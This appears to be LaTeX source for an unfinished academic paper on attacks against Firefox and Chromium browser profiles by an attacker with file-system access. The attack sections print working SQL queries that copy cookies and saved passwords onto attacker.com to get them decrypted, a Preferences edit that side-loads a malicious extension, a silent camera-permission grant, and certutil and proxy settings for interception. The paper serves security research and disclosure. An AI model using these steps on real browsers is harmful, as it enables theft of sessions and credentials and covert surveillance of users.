    \begin{tabular}{|l|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}|p{0.05cm}}
        \hline
        \bfseries{Attacks} & \multicolumn{3}{c|}{\bf Firefox } &  \multicolumn{3}{c|}{\bf Chromium} &  \multicolumn{3}{c|}{\bf Safari} \\ \hline 
         \bfseries{Capabilities on File System} & \bfseries{r} & \bfseries{w} & \bfseries{x} & \bfseries{r} & \bfseries{w} & \bfseries{x} & \bfseries{r} & \bfseries{w} & \bfseries{x} \\ \hline 
         Session Hijacking (Cookies) & \greencheck & \greencheck  & \greencheck & & \greencheck & \greencheck  & & & \\ \hline 
         MiTM Attacks & & \greencheck  & \greencheck & & \greencheck & \greencheck  & & & \\ \hline 
         Malicious Extensions & & \greencheck & \greencheck & & \greencheck & \greencheck  & & & \\ \hline
         %Universal XSS & & \greencheck & \greencheck & & \greencheck & \greencheck \\ \hline \hline
         Disable same-origin policy (SOP) & & & & & & \greencheck  & & &  \\ \hline 
         %Session hijacking & \greencheck & \greencheck & \greencheck &  & \greencheck & \greencheck \\ \hline 
         History sniffing & \greencheck & \greencheck & \greencheck & \greencheck & \greencheck & \greencheck & & &  \\ \hline 
         Passwords exfiltration & & \greencheck & \greencheck & & \greencheck & \greencheck & & &  \\ \hline 
         Preferences Changes  & & \greencheck & \greencheck & & \greencheck & \greencheck  & & &  \\ \hline 
         Encryption Bypass & & \greencheck & \greencheck & & \greencheck & \greencheck & & &  \\ \hline
         Permissions to use devices  & & \greencheck & \greencheck & & \greencheck & \greencheck  & & \greencheck & \greencheck \\ \hline 
         Auto-fill data & \greencheck & \greencheck & \greencheck & \greencheck & \greencheck & \greencheck & & &  \\ \hline 
    \end{tabular}
    \caption{Attacks that can be mounted against web browsers leveraging different access capabilities to profile folders}
    \label{tab:security_attacks_capabilities}
\end{table}

%\section{Security Analysis and  Attacks}
\section{Compromizing Browser Profiles}
%\section{The FS Attacker vs. Browser Profiles}
\label{sec:compromizing_browser_profiles}

Provided a file system attacker with different levels of accesses, we summarize the various attacks that can be performed against browser profiles. 

\subsection{Read-able Attacker}
\label{sec:read_able_attacker}

\subsection{Write-able Attacker}
\label{sec:write_able_attacker}
%\label{sec:security}
%\label{sec:attacks}


\subsection{Bypass Chromium Cookies Encryption}
\label{sec:attacks_cookies}
A natural approach to bypassing encryption would be to engage in the process of reverse-engineering the key used by the browser to perform the cryptographic operation, as prior work has attempted~\cite{Sanchez-etal-20-CANS}. Instead, we found that, even without knowing the key, the encryption is trivially bypassed by an attacker with a write permission. The critical observation we made by analyzing the way the encrypted values were stored in the profile folders is that in all cases, there is not a hard link between the encrypted values and the website they belong to. In other words, the messages are not \emph{authenticated}~\cite{HMAC}. Therefore, an attacker can rewrite or copy the entries in the database to assign a website under their control. Then, when the user visits their website, the browser will decrypt the encrypted values and make them readable in clear to the attacker. 

To bypass encryption on cookies, one can copy rows in the original database, with the encrypted values, assign the name and set it to the attacker domain, then insert the modified rows back into the database. 
%One can even change the attributes of different cookies flags (for instance disable the HttpOnly flag to make cookies accessible to JavaScript or change the path  to \code{/} in order to force the browser into send all the cookies when the user visits the attacker landing page). Once the browser launches and the user visits the attacker domain, the browser will decrypt the encrypted cookies and send them to the attacker. 
Listing~\ref{lst:chromium_cookies_encryption_bypass} demonstrates this process where cookies from \url{youtube.com} are copied and sent to \url{attacker.com}
%
%
\begin{lstlisting}[language=SQL, caption={SQL query to bypass Chromium encryption of cookies. All the cookies of the target website, i.e. youtube.com are copied and set to the attacker domain attacker.com.}, label={lst:chromium_cookies_encryption_bypass}]
INSERT INTO cookies (host_key,top_frame_site_key,value,is_httponly,creation_utc,name,encrypted_value,path,expires_utc,is_secure,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party,last_update_utc) 
SELECT ".attacker.com","","",0,creation_utc,name,encrypted_value,path,expires_utc,is_secure,last_access_utc,has_expires,is_persistent,priority,samesite,source_scheme,source_port,is_same_party,last_update_utc FROM cookies
WHERE host_key = "youtube.com";
\end{lstlisting}
%
%
Once the browser launches and the user visits the attacker's website, the cookies are automatically decrypted and sent to the attacker. As one can notice, the \code{HttpOnly} flag is also disabled, making the cookies directly accessible to JavaScript as well. The read cookies can be used to populate a browsing session under the control of the attacker, leading to the hijacking of the user's browsing session~\cite{SessionHijacking}. The consequences can range from financial loss, access to sensitive and confidential, data, photos, access to private mail, etc. 

\subsection{Bypassing Passwords Encryption}
\label{sec:attacks_saved_credentials_and_passwords}

The intuition about bypassing the encryption process on the saved credentials, even for Firefox, is exactly the same as described for encrypted cookies in Chromium browsers (Section~\ref{sec:attacks_cookies}): the attacker makes copies of the encrypted passwords, changes the site name to one under their control and update the original databases with the new entries. 
%To ease the manipulations of the SQLite databases, the attacker can employ a backend server equipped with NPM packages like sqlite3~\cite{SQLite3NPM}
Listing~\ref{lst:chromium_passwords_encryption_bypass} shows a code snippet used to steal the user's Facebook credentials in a Chromium browser. 
\begin{lstlisting}[language=SQL, caption={SQL query to bypass Chromium encryption of passwords. All the credentials of the target website, i.e. \url{facebook.com} are copied and set to \url{attacker.com}. To retrive the stolen credentials, the attacker adds a form to their home page with the input fields named "email" and "pass".}, label={lst:chromium_passwords_encryption_bypass}]
INSERT INTO logins (origin_url,action_url,username_element,username_value,password_element,password_value,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,skip_zero_click,generation_upload_status,date_last_used,date_password_modified,date_received,sharing_notification_displayed) 
SELECT "https://attacker.com", "https://attacker.com/", "email", username_value, "pass", password_value, "https://attacker.com/", date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,skip_zero_click,generation_upload_status,date_last_used,date_password_modified,date_received,sharing_notification_displayed FROM logins 
WHERE origin_url = "https://www.facebook.com/"
\end{lstlisting}
Once the user visits the website under the control of the attacker, the home page has a form, which the browser will automatically populate with the stolen credentials after it decrypts them. At this point, the attacker can read the credentials and leverage them in the backend to log in as the user~\cite{SessionHijacking}. %~\footnote{Provided that no additional factors, e.g. 2FA are not enabled to finalize logins}. 
The same process has been followed for stealing Firefox browsers credentials, therefore we omit further details about this case. %to conserve space.

\subsection{Browser Extensions and Code Executions}
\label{sec:attacks_extensions}

For an attacker, extensions represent an interesting target, because, in addition to code execution (i.e. XSS~\cite{OWASP_Types_Of_XSS}), the attacker can abuse the privileges of the extension and its powerful APIs to access any user information: content scripts can be injected in web pages to read login credentials; the background script can inspect/modify requests and response, etc. % headers, requests bodies with the \code{webRequest} API for instance, grant access permissions to the camera, microphone, geolocation, web push notifications (See Section~\ref{sec:attacks_permissions}), with the \code{contentSettings} API~\footnote{\url{https://developer.chrome.com/docs/extensions/reference/api/contentSettings}}, etc. See Section~\ref{sec:responsible_disclosure} for details about our discussion with the vendors on these issues.

%With execute-able capability, an attacker can load and execute malicious code in all browsers. (See the Appendix for further details about this scenario). Nonetheless, with a write-able attacker, we have been able to execute malicious extensions in many Chromium-browsers and Firefox leveraging different techniques. 

\subsubsection{Firefox: adding a signed malicious extension} 
Instead of trying to bypass the integrity checks performed by Firefox, the intuition about this attack is to rather develop and upload a malicious-but-signed extension to a repository that is trusted by Firefox, e.g. AMO~\cite{AMO-Firefox}, then regularly install it in a Firefox profile, and copy the metadata generated by the browser and the extension signed XPI bundle to the victim user's browsing profile. Specifically, 2 files are to be copied:
(i) \code{extensions.json} which contains the list of installed extensions and the extension XPI bundle which is stored in the \code{extensions/} folder. 
Once the user launches their browser, the malicious extension(s) will be loaded and executed without them noticing. The browser will not complain because the extension is signed by Mozilla. 
In fact, malicious extensions are regularly found on AMO~\cite{AMO-Malicious-Addons}. Malicious extensions can also be kept unlisted so that researchers scanning these repositories do not find and report them, potentially leading to removal. Finally, an attacker can host an extension on a server under their control, as long it is served with the right \code{application/x-xpinstall} MIME type.


\subsubsection{Chromium: side-loading a developer extension}
\label{sec:chromium_side_loading_unsigned_extensions}

Similarly to the Firefox attack, attackers can also silently install a Chromium extension by modifying the browser profile. Even worse, Chromium-based browsers allow the installation of unpacked, previously unpublished extensions when the browser is in \emph{Developer mode}. Our main insight is that attackers can load such an extension in their own Chromium instance, and then transfer the extension to the same folder location on the victim's machine and modify the victim's profile to mark the extension installed and enabled, carefully preserving the integrity protection values~\cite{Sanchez-etal-20-CANS}. 
Concretely, we first copy the extension in \texttt{/tmp/mal-extension} on the victim's machine and then enable the extension by crafting an entrance in the \texttt{Preferences} file and modifying the corresponding hash value. 
\begin{lstlisting}[language=JavaScript, label={lst:firefox_temporary_addon_web_ext}, caption={Modifications to the Chromium's preference file in the profile, to install an unpacked, malicious extension.}]
  let prefs = JSON.parse(prefsFileFromProfile)  
  prefs["extensions"]["settings"]["fjjfbkngnepigchnpa"] = JSON.parse(`{...,"from_webstore":false,"granted_permissions":{...},"path":"/tmp/mal-extension","state":1,...}`);
  prefs["protection"]["macs"]["extensions"]["settings"]["fjjfbkngnepigchnpa"] = "6D4F0E88A85DDB4AA1A7...";
  // overwrite the preference file
\end{lstlisting}
Listing~\ref{lst:firefox_temporary_addon_web_ext} shows a fragment of the concrete payload, illustrating that  attackers have fine-grained control over the permissions granted to the extension, without user consent.
We observe that this attack is successful even when the victim's browser is not set in \emph{Developer mode}, allowing for stealthy installation of extensions.

%\done{Cris do you mind writing this section with the attack you reported to the Chrome Security team, where you abused symbolic links}

\subsubsection{Chromium: infecting a signed extension} 
\label{sec:infecting_chromium_extensions_fsa}
From discussions with various vendors, it appeared that the integrity checks on extensions are not enabled by default in the Chromium sources. This means that it is the responsibility and choice of each vendor to enable it. Hence, if one just builds a Chromium browser from the sources, or simply chooses not to enable this feature, future signed extensions that the user will install can be manipulated. The raw Chromium build is in this situation, which one may argue is expected. Are also affected all users (developers) building their own Chromium browser from the sources, to disable Google Services for privacy reasons~\cite{Ungoogled-Chromium}. But more interestingly, among the official browsers we have tested, we found that the Vivaldi browser does not enable integrity checks on extensions. Actually when considering malware on the user's machine, all Chromium browsers fail to properly perform integrity checks (See Section~\ref{sec:infecting_chromium_extensions_malware}).  As the company claims almost 3 million active users for its cross-platform browser~\cite{VivaldiUsers}, the portion of exposed (desktop) users may be rather substantial. 

%\todo{We way want to add information about extensions in the Chrome Web Store, the most popular permissions, and the versions: this is information that I can quickly gather. We can do the same for Opera browser}


\subsection{Bypassing User's Permissions}
\label{sec:attacks_permissions}

Listing~\ref{lst:attack_permissions_firefox} shows an SQLite query to modify the \code{permissions.sqlite} database in a Firefox profile directory to grant the attacker access to the camera.  
%Listing~\ref{lst:attack_permissions_firefox} demonstrates how to grant \code{https://attacker.com} access to the camera, microphone, GPS and web push notifications in a Firefox browser. 
%
\begin{lstlisting}[language=SQL, label={lst:attack_permissions_firefox}, caption={Editing the permissions.sqlite database to grant the attacker access to the user's camera.}]
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "camera", 1, 0, 0, 1702964711537);
\end{lstlisting}
Access to the microphone, GPS, or the ability to send them web push notifications are granted similarly.
%
\iffalse
\begin{lstlisting}
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "microphone", 1, 0, 0, 1702964711537);
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "geo", 1, 0, 0, 1702964711537);
INSERT INTO moz_perms (origin, type, permission, expireType, expireTime, modificationTime) values ("https://attacker.com", "desktop-notification", 1, 0, 0, 1702964711537);
\end{lstlisting}
\fi
%
Concretely, when the user visits the attacker's site, the browser will not prompt the user to grant permission to access these features as they would have been automatically and silently granted to the malicious website. The attacker can then turn on the user's microphone or camera, and track their physical location, and with a registered service worker, they can serve web push notifications~\cite{WebPushNotifications}. In Chromium browsers, the manipulations are similar and therefore omitted. 
%
%With this attack, the adversary can grant themselves a silent access to all of these devices, bypassing the user's content and permission prompt. 
%


\subsection{Custom Root Certificates and MitM Attacks}
\label{sec:attacks_mitms}
To mount a Man-in-the-middle (MiTM) attack where all requests and responses are redirected to an HTTPS proxy, one has to be able to (i) make the browser trust a custom root certificate authority (CA) and (ii) additionally instruct the browser to redirect all the traffic to the MiTM proxy. 

{\bf Firefox Browsers}
The \code{certutil} utility from the Network Security Service libraries~\cite{NSSDB} makes it easy to add custom CA to these files. To do so, one reads, serializes, and sends the content of these files to a backend server equipped with the \code{certutil} and a malicious root CA under the control of the attacker.  Then, the attacker adds their custom CA as shown in Listing~\ref{lst:attack_mitm_proxy}.
\begin{lstlisting}[label={lst:attack_mitm_proxy}, caption={Adding a custom CA to a CAs database: \code{temporary\_profile} is a folder containing the \code{cert9.db} and \code{key4.db} and \code{mitmproxy-ca-cert.pem} is the malicious root CA to be tagged \code{mitmproxy} in the CAs database.}, language=bash]
certutil -d temporary_profile -A -t C -n mitmproxy -i mitmproxy-ca-cert.pem
\end{lstlisting}
Then the updated \code{cert9.db} and \code{key4.db} are copied and returned to the user to replace the original custom CA databases. Finally, the attacker modifies the \code{prefs.js} file to indicate the location (IP and port number) of the MiTM proxy server, as shown in Listing~\ref{lst:attack_mitmproxy_ip_port_firefox}.
\begin{lstlisting}[language=JavaScript, label={lst:attack_mitmproxy_ip_port_firefox}, caption={Indicating the location (IP and port) of the MiTM proxy to Firefox. Here we are using a private local IP address, but any (publicly) accessible IP can be used.}]
user_pref('network.proxy.http', '127.0.0.1');
user_pref('network.proxy.http_port', 8080);
user_pref('network.proxy.ssl', '127.0.0.1');
user_pref('network.proxy.ssl_port', 8080);
user_pref('network.proxy.type', 1);
\end{lstlisting}
Now when the user launches the infected browser, all of their traffic is silently redirected to the MiTM proxy, where all HTTPS content is viewed in clear, and can be manipulated to inject additional code, log and exfiltrate credentials, hijack financial transactions, etc. This attack is particularly powerful, because even requests and responses issued by the browser itself, e.g. to check for updates or to download, verify, and install extensions, can be viewed and tampered with. 
In our demos, we extensively used the Mitmproxy~\cite{Mitmproxy} HTTPS proxy and developed a Python addon to view and manipulate request and response headers and bodies.

{\bf Chromium browsers}:
Manipulating the content of this folder is exactly the same as in the case of Firefox above (See Listing~\ref{lst:attack_mitm_proxy}). When this step is successful, the attacker is still left with indicating to the browser the location of the MiTM proxy server (IP and port). %~\footnote{An execute-able attacker could have used command line options to achieve this}. 
The solution we found -- because we are so far dealing with social engineering -- was to trick the user into installing a minimal browser extension. The logic of this extension is to invoke the proxy API to indicate the location (IP and port) of the HTTPS proxy server~\cite{WebExtensionProxyAPI}. For our controlled experiments, we developed, published, and kept unlisted such an extension on CWS~\cite{XPROXY}.

\iffalse
Listing~\ref{lst:attack_mitmproxy_ip_port_chromium}.
\begin{lstlisting}[language=JavaScript, label={lst:attack_mitmproxy_ip_port_chromium}, caption={Indicating the location (IP and port) of the MiTM proxy to a Chromium browser. Here we are using a private local IP address, but any (publicl)y accessible IP can be used, as in the case of Firefox (See Listing~\ref{lst:attack_mitmproxy_ip_port_firefox}).}]
chrome.proxy.settings.set({ value: { mode: "pac_script",
    pacScript: { data: "function FindProxyForURL(url, host) { return 'PROXY 127.0.0.1:8080'; }" }
}, scope: 'regular' }, function() {});
\end{lstlisting}
\fi



\subsection{Browsing History Sniffing}
\label{sec:attacks_history_sniffing}
\todo{To Fill in with the right information}
Users' browsing history, and other saved content may not seem as critical as passwords, but they have immense value to advertisers\cite{simon_hill}. Auto-fill data like people's names, addresses, emails, etc. may serve the attacker to spy on individuals. Emails can be gathered and sold to e.g. scammers, companies, or advertisers.



==> study.tex <==
\section{Empirical Study of Browser Profiles}
\label{sec:study}
\todo{This Section will be related to the the description of the browser profile folders}.


%We map this information to the attacker models discussed in Section~\ref{sec:threatmodel} and the capabilities required to take advantage of these behaviors and states. 


\crs{I would not structure this section based on browser family findings, but based on things that are contained in browser profiles and how they can be manipulated}

\crs{We need a badass table in this section to give an overview of all the attacks we propose, the browser in which they are supported, if they need read/write permissions each, etc.}


\subsection{Browser (Profile) Folders Locations}
\label{sec:study_user_browser_profile}
Profiles are folders created by browsers to store user browsing data, programs, preferences and settings. 
When the browser is first launched, it creates and store the user profile data in in well-known locations depending on the operating system, the web browser and the way it has been installed~\cite{ChromeProfileFolders, FirefoxProfileFolders}. 
%
%
%
\begin{table}[!htp]
    \centering
    \begin{tabular}{|l|l|l|}
        \hline 
        \bfseries{Parent Folder} & \bfseries {Browsers}  \\ \hline  
        \url{.config/}  & Chromium-based browsers \\  \hline 
        \url{snap/chromium/} & raw Chromium build \\ \hline
        \url{.mozilla/, snap/firefox/} & Firefox \\ \hline
        \url{.librewolf/} & LibreWolf \\ \hline 
        \url{.waterfox/} & Waterfox \\ \hline 
        \url{.moonchild productions/} & Palemoon \\ \hline 
    \end{tabular}
    \caption{Browser profiles default root locations for Chromium and Firefox browsers on Linux. The parent folders are given relatively to the user's home directory, hereafter referred to as $\$HOME$. Tor is a Firefox-based browser, but it has known security and privacy practices that where mininal to no data is stored on the user profile folder.
    }
    \label{tab:browser_profiles_default_locations_linux}
\end{table}

%
%
%
Table~\ref{tab:browser_profiles_default_locations_linux} shows the default locations for Chromium and Firefox browser profiles on Linux systems. All the default folders are related to the user home directory (\code{~/} or $\$HOME$). When the browsers are regularly installed~\footnote{Installed using native package manager like apt, yum}, the folders are located in the hidden \code{.config/} folder (for Chromium browsers) and \code{.mozilla/} for Firefox browsers. For the browsers packaged and installed with snap~\cite{SNAPD}, the default folders are moved to \code{snap/} under the user home directory. 
%
%
%
\begin{table}[!htp]
    \centering
    \begin{tabular}{|l|l|}
        \hline 
         \code{--user-data-dir=custom\_profile} & Chromium browsers \\ \hline 
         \code{--profile custom\_profile} & Firefox browsers \\ \hline 
    \end{tabular}
    \caption{Command line options to launch browsers with (custom) profile folders}
    \label{tab:custom_browser_profiles_custom_locations}
\end{table}
%
%
%
Furthermore, browsers provide users with the ability to create additional browsing profiles and switch among them when the browser launches. This can for instance be done with command line options, as shown in Table~\ref{tab:custom_browser_profiles_custom_locations}. Browsers do not impose restrictions on the locations of the custom profile folders on the user's device. 

%
%
Browsers isolates, clusters and stores browsing data according to the default or custom profile chosen by the user when the browser launches. By doing so, one can effectively have multiple and different browsing activities, even within the same website, within the same browser. For instance, one can log in multiple times with one or multiple accounts to the same website, while still enjoying a separation of browsing activities and data. Hence users browsing data is stored in specific folders under the root profile data. For instance, the default folder is effectively \textit{\$HOME/.config/google-chrome/Default/} for Chrome. For Firefox, the default user browsing data folder has the form \textit{\$HOME/.mozilla/firefox/$RANDOM$.default-release}, where \textit{RANDOM} is a random string, e.g. 8sypm4uk (See Figure~\ref{fig:fsa_file_browsing}). Additional and custom profiles are also stored in the root profile folders. At runtime, navigating the special URIs \code{chrome://version} and \code{about:profiles} respectively in Chromium and Firefox browsers yield the effective location where the running browser is reading and writing the current user's browsing data. 

\subsection{Structure of Profile Folders Content}
\label{sec:study_structure_user_browsing_data}
In this Section, we detail the content of the browsing data stored by recent Chromium and Firefox browsers. We also discuss the access control mechanisms implemented by browsers.
%in light of the threat model discussed in Section~\ref{sec:threatmodel}.
Table~\ref{tab:browser_profiles_content} summarizes a subset of the content, among those that are relevant to this work. 

\begin{table*}[!htp]
    \centering
    \begin{tabular}{|l|l|l|l|}
        \hline
        & \bfseries{Chromium} & \bfseries{Firefox} & \bfseries{Description} \\ \hline 
        Cookies & \cellcolor{green!100}\code{Cookies} & \cellcolor{red!100}\code{cookies.sqlite} & SQLite database\\ \hline  
        Permissions & \cellcolor{red!100}\code{Preferences} (JSON) & \cellcolor{red!100}\code{permissions.sqlite} & Permissions \\ \hline \hline
        Extensions & \cellcolor{green!100}\code{Extensions/} & \cellcolor{green!100}\code{extensions/} & Extensions folders \\ \hline \hline
        Saved Passwords & \code{} & \code{} & Browsing history \\ \hline \hline 
        Browsing History & \code{} & \code{} & Browsing history \\ \hline \hline 
        Bookmarks & \code{} & \code{} & Browsing history \\ \hline \hline 
        Auto-fill and search history data & \code{} & \code{formhistory.sqlite} & Search history and auto-fill  \\ \hline \hline 
        Preferences & \code{} & \code{} & Browsing history \\ \hline \hline
    \end{tabular}
    \caption{Firefox and Chromium browser profiles content and structure.}
    \label{tab:browser_profiles_content}
\end{table*}


\subsubsection{Cookies}
\label{sec:browser_profiles_cookies}
In both browser families, cookies are stored in SQLite databases, i.e. \code{cookies.sqlite} for Firefox and \code{Cookies} for Chromium. The different tables -- \code{moz\_cookies} (Firefox) and \code{cookies} (Chromium) -- and their columns store and describe the cookies set by websites along their attributes, including the domain, name, value, and various security and privacy flags and prefixes like HttpOnly, Secure~\cite{CookiesMDN}. Cookies are stored in clear in Firefox browsers, making them trivially accessible to all attackers with a read capability. In Chromium-browsers, the cookie values stored in the database are \emph{encrypted}. 


\subsubsection{Extensions}
\label{sec:browser_profiles_extensions}
Given their access to elevated privileges and APIs in the browser, the process of publishing and installing extensions is particularly surrounded with drastic security mechanisms. First of all, extensions are signed and must come from trusted sources, like the CWS~\cite{CWS-Chrome} and AMO~\cite{AMO-Firefox}. Then, the during installation process, users are prompted to review and confirm the capabilities (permissions) requested by the extensions to function at runtime. The browsers checks the integrity of the downloaded extensions to detect manipulations during the download process (by a network attacker for instance). Once installed, the extension sources (JavaScript, HTML, CSS, images, etc.) are saved in the profile folder, under (\code{extensions/} for Firefox and \code{Extensions/} in Chromium). In Firefox, it is the original zip file (\code{.xpi}) of the extension that is stored. On Chromium however, it is the unpacked extension resources that are stored on disk. Additional metadata and security files are generated and stored along the extensions. For Firefox, the metadata are part of the XPI bundle in the \code{META-INF/} folder. For Chromium, the metadata are stored under \code{\_metadata/} under the unpacked extensions root folder. Additional signatures related to installed extensions are also stored in the \code{Secure Preferences} file~\cite{Sanchez-etal-20-CANS}. Then when the browser launches, the extensions sources stored locally go through integrity checks to ensure that they have not been tampered with. If this is the case, the extension may be offloaded and the user invited to reinstall a fresh version of it. 


\todo{Moved a section related to execute-able attacker to the appendix because it is too strong: we may say a word about it in this section to be comprehensive}



\subsubsection{Saved Login Credentials: passwords and Usernames}
\label{sec:browser_profiles_credentials}

Browsers save passwords and usernames locally to ease and speedup the process of logging into accounts by auto-filling the credentials fields. If the user forgets a password or a username for a specific site, these can be easily looked up in the browser settings. 

On Firefox, passwords and usernames are stored in two files: \texttt{key4.db} and \texttt{logins.json}. \texttt{logins.json} stores entries of credentials, each consists of hostname, encrypted password, encrypted username and some metadata. On the other hand, \texttt{key4.db} contains the encryption key for decrypting credentials (this key is also encrypted), an encrypted password check value, and other necessary data for the encryption/decryption process (e.g. Salts). Firefox uses 3DES symmetric encryption algorithm to encrypt/decrypt passwords, usernames, encryption key and password check value \cite{apr4h}. Firefox offers an option to encrypt the encryption key using a "Primary Password" that can be set by the user, and is only known to that user. If this option is enabled, Firefox first receives this password from the user, uses it to decrypt the password check value and then checks the result against a hard coded value. If the check is successful, then the correct password was provided and then it will be used to decrypt the encryption key, which will eventually be used to decrypt the credentials in \texttt{logins.json}. If the option of using a primary password was not set by the user, an empty string will be passed in place of the primary password and the rest of the process stays the same.

On Chrome, the passwords in saved credentials are also encrypted and stored in the \code{Login Data} SQLite database, under the table \code{logins}. 


\subsubsection{Permissions}
\label{sec:browser_profiles_permissions}

Permissions grant access for websites to use device resources such as storage, camera, microphone, GPS, web push notifications, etc. When a website asks for a permission, a pop-up window for that permission appears asking for user's consent. 

In Firefox, all permissions are stored as an SQLite database (\texttt{permissions.sqlite}). Each entry consists of a domain, name of permission, a number representing whether the permission was allowed or blocked, and other time info.  In Chromium, all permissions are stored in the \code{Preferences} JSON file. No integrity check is performed on these files. 


\subsubsection{Custom Certificate Authorities }
\label{sec:browsing_profiles_HTTPS_Proxy}

\todo{To Describe}




\subsubsection{Browsing history and bookmarks}
\label{sec:browsing_profiles_history}

The three types are self-explanatory. Here the downloads are the records of what has been downloaded and their current state, not the files themselves. The three types are saved in one SQLite database (\texttt{places.sqlite}) on Firefox and \code{History}, \code{Top Sites}, \code{Bookmarks} for Chromium browsers. 





\subsubsection{Search history and autofill}
\label{sec:browsing_profile_auto_fill}
This data helps with performing search faster and also filling forms faster as forms usually asks for the same basic data, such as First name, Last name, address, phone number, etc. Both search history and autofill data are saved in one table in a SQLite database (\texttt{formhistory.sqlite}) in Firefox and various tables (e.g. autofill, bank\_accounts) in the \code{Web Data} SQLite DB for Chromium.


\subsubsection{User Preferences}: 
\label{sec:browsing_profile_preferences}
Google Safebrowsing, tracking protection, etc.
Preferences are a set of rules that customize browser's behavior. These rules are responsible of the appearance (theme) of browser, setting the default search engine, managing the user interactions with the browser, security settings and much more. In Firefox browsers, the user can edit a wide variety of rules in the browser's settings, or by accessing \texttt{about:config} page and editing/adding rules there. Preferences rules are set through a JavaScript file called \texttt{prefs.js}. Each rule should be defined using the \texttt{user\_pref} function by passing the name of the rule as the first parameter, and the value as the second parameter. Firefox encourages users who wants to add their rules to add them in a separate file called \texttt{user.js}, or to define/edit them in the \texttt{about:config}. 


\subsection{Other browsing profiles files and folders}
\label{sec:study_other_browser_folders}
\todo{\$HOME/.pki/nssdb/}

==> web_technologies_and_security.tex <==
\subsection{Web Technologies, Features and Security}
\label{sec:web_technologies_and_features}
\label{web_security_attacks}

Though it has gain in complexity throughout its evolution thanks to the introduction of various technologies and features, the Web architecture can still be simplistically understood as clients (i.e. web browsers) interacting with web servers to access and exchange information. The HyperText Transport Protocol (HTTP) is the predominant communication protocol mutually understood between clients and servers. HTTP requests and responses, identified by URIs and in particular URLs, carry various information like the method or verb (i.e. GET, POST), headers like cookies which have enabled sessions in the otherwise stateless HTTP protocol, or the request and response body which holds the main transported payloads. Common exchanged resources include HTML pages, media resources like images, videos, presentation content like CSS files, or source codes, mostly JavaScript, that implement client-side logic of web applications that will be executed in browsers.

The core of browsers is built on standard technologies like HTML, CSS, JavaScript pushed for by organizations like the W3C, ECMA International, WHATWG or IETF, just to name a few. 

\todo{Talk here about various browser features, in particular those that we will talk about later on}
\begin{itemize}
    \item {\bf JavaScript} is the predominant programming language in the Web. Web assembly has been introduced to complement JavaScript and not as a replacement. JavaScript implement the dynamic functionality that make the great of web applications via many APIs that enrich its core. One such API is the Document Object Model (DOM) representing HTML pages at runtime and makes it possible to manipulate web pages dynamically, to validate forms with user credentials. APIs like the AJAX (XMLHttpRequest or fetch) let web applications interactions interact with remote web servers to download data, and update web pages on the fly. JavaScript is extensively leveraged to receive and process user inputs and their interactions with web sites.
    \item {\bf Browser extensions}: are third party programs with elevated privileges, allowing them to extend the browser with additional features and enhance users browsing experience, or access to and manipulate user browsing data on the fly. At the time of this writing, the WebExtensions API, a cross-browser extensions API is supported by major browser, including Chrome, Edge, Firefox and Safari. 
    \item {\bf HTTPS and the PKI}: With the Public Key Infrastructure(PKI), HTTPS brings security to the otherwise unencrypted HTTP protocol. Users traffic is transmitted encrypted. Browser binaries installed on user devices are bundled with trusted root certificate authorities (CAs) browsers rely on to validate certificates web sites present to them. % thwarting the ability of network attackers to extract user sensitive information like credentials or financial data or inject malicious content into the users' browser with the same access impacts. 
    \item {\bf Usability}: Modern browsers compete with numerous features aim at attracting users and provide them with the best browsing experience. Saving credentials, in particular passwords, in order to quickly log into websites, saving session cookies in order to avoid repetitively asking for credentials to log into websites, bookmarking their favorite pages and preserving their browsing history and favorite web sites. 

\end{itemize}

For many reasons that have to do with the  staggering amount of users sensitive information they process, browsers and their features and technologies and web applications are prominent targets for adversaries. The Open Worldwide Application Security Project (OWASP) maintains a classification of common Web attacks~\cite{PathTraversal-OWASP}. 
In reaction to or anticipation of these potential and actual attacks vectors and vulnerabilities~\footnote{This is a constant cat and mouse chase}, browsers implement various security mechanisms in order to best protect data they process. Common security mechanisms implemented in browsers or prominent web attacks they aim at mitigating include:
\begin{itemize}
    \item {\bf Same-Origin Policy (SOP)} is the baseline security mechanism implemented by browsers. First of all, it clusters web applications by origin -- composed of the triple scheme (e.g. \code{https}), hostname (e.g. \code{example.com} and port number (e.g. \code{443}) -- and guards many interactions between JavaScript, storage data according to this notion of origin: same-origin browsing contexts can usually freely interact, while cross-origin interactions may be forbidden in a first place or guarded by further refinements like the Cross-Origin Resource Sharing (CORS) in the case of AJAX, or Content Security Policy to blocklist untrusted origins, etc. There are many other security mechanisms implemented by major browsers, the result of the continuous iteration of making the Web a secure place, as new attacks are discovered: CORB, CORP.  
    \item {\bf Sandboxing and Isolated Worlds}: mention Spectre, and new mechanisms like CORB, CORP, etc.
    \item {\bf Use of HTTPS} implement TLS/SSL to protect data in transit: confidentiality, integrity
    \item {\bf Cookies and Session Hijacking}: unique and unpredictable session tokens (cookies), setting appropriate cookie attributes (like HttpOnly and Secure flags).   
    %\item {\bf Secure Cookies Flags}: mitigates the impact of XSS, CSRF.
    \item {\bf CSP vs. XSS}: mitigates XSS, Clickjacking,
    \item {\bf Tracking and protection}: built-in tracking protection, adblockers, 
    \item {\bf Safe browsing vs. malicious sites}: database of known deceptive sites like Google Safe browsing,
\end{itemize}








